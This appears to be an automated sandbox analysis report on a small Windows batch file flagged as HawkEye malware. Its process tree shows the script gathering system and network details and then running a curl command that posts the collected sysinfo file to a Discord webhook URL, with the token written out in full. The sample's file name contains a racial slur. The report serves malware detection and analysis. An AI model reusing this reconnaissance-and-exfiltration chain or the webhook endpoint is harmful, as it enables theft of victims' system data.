Analysis

  • max time kernel
    100s
  • max time network
    128s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250313-en
  • resource tags

    arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    01/04/2025, 14:40

General

  • Target

    niggagimeinfo.bat

  • Size

    732B

  • MD5

    a874910a487c124be0f303e1c626091c

  • SHA1

    1f160820d42a658baf7b4fa3759847d2acdef6a0

  • SHA256

    c6c4ab9000f281ecd77ca3a6bc7d1c9844c5d28bb19a8ee416a8c6cc1e597987

  • SHA512

    df0381058099400a48f1e63f22141d9a0f385a6ab427df4ecc55331f85347a6ebb0d4eecca3491a39496bc91098ef3efffce941f3e03ced308505da565ff9041

Malware Config

Signatures

  • HawkEye

    HawkEye is a malware kit that has seen continuous development since at least 2013.

  • Hawkeye family
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\niggagimeinfo.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4948
    • C:\Windows\system32\HOSTNAME.EXE
      hostname
      2⤵
        PID:2840
      • C:\Windows\system32\whoami.exe
        whoami
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1472
      • C:\Windows\system32\systeminfo.exe
        systeminfo
        2⤵
        • Gathers system information
        PID:5416
      • C:\Windows\system32\findstr.exe
        findstr /B /C:"OS Name" /C:"OS Version"
        2⤵
          PID:5656
        • C:\Windows\system32\ipconfig.exe
          ipconfig
          2⤵
          • Gathers network information
          PID:3340
        • C:\Windows\system32\findstr.exe
          findstr IPv6
          2⤵
            PID:2240
          • C:\Windows\system32\ipconfig.exe
            ipconfig
            2⤵
            • Gathers network information
            PID:1072
          • C:\Windows\system32\findstr.exe
            findstr IPv4
            2⤵
              PID:4920
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic logicaldisk get caption, freespace, size
              2⤵
              • Collects information from the system
              • Suspicious use of AdjustPrivilegeToken
              PID:480
            • C:\Windows\system32\curl.exe
              curl -X POST https://discord.com/api/webhooks/1356637948279394315/wBsP0ldZy-OklbkGSc8jSiZ8Y16MimqHEj7Ln0Ff1INRHzRS024TSAFclzmg8-DVJw_b -H "Content-Type: application/json" -d "{\"content\": \"```\n$(type "C:\Users\Admin\AppData\Local\Temp\sysinfo.txt")\n```\"}"
              2⤵
                PID:3348

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads